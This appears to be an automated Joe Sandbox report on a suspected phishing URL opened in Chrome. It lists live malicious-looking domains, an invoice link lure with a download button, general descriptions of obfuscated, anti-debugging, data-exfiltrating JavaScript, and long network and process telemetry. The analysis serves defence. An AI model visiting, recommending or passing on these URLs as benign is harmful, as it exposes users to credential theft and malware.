Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://whtt.termlicari.ru/HnkNbg/

Overview

General Information

Sample URL:https://whtt.termlicari.ru/HnkNbg/
Analysis ID:1578419

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1944,i,1992526057223175153,14245513453676598197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 1552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://whtt.termlicari.ru/HnkNbg/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://app.paymoapp.com/api/invoices/1722928/?token=cru1YSx05ZXoUbyUK21kn8zSRgurmuahl%2B7l83%2FGz357lR0pnLMoRGY5Sk%2FGNcGSYLDtyxmup%2BroyOn7j0EBl6VaCwjpFqZSLbHrv5GCWxA%3D&format=htmlJoe Sandbox AI: Page contains button: 'CLIQUE AQUI PARA FAZER O DOWNLOAD' Source: '3.9.pages.csv'
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://whtt.termlicari.ru/HnkNbg/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://whtt.termlicari.ru/HnkNbg/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to the 'teams.microsoft.com' domain, which is likely a phishing attempt. The overall behavior of this script is highly suspicious and indicates a high risk of malicious intent.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://whtt.termlicari.ru/HnkNbg/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The script also includes obfuscated code and a self-executing function, which are common techniques used in malicious scripts. Overall, this script demonstrates a high level of suspicious and potentially malicious activity.
Source: https://whtt.termlicari.ru/HnkNbg/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.126.37.128:443 -> 192.168.2.17:49865 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49868 version: TLS 1.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: global trafficDNS traffic detected: DNS query: whtt.termlicari.ru
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: nft3stma7ftpc3rntxdlvbenmkj0n4bqviksdd1hg2oc6z9ylbx4nsgb86yd.ygncsqvu.ru
Source: global trafficDNS traffic detected: DNS query: app.paymoapp.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: teams.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: static-spa.paymoapp.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.126.37.128:443 -> 192.168.2.17:49865 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49868 version: TLS 1.2
Source: classification engineClassification label: mal48.win@28/118@40/244
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1944,i,1992526057223175153,14245513453676598197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://whtt.termlicari.ru/HnkNbg/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1944,i,1992526057223175153,14245513453676598197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
